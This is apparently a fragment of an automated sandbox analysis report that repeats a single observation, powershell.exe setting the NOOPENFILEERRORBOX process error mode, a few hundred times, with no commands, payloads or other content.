      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
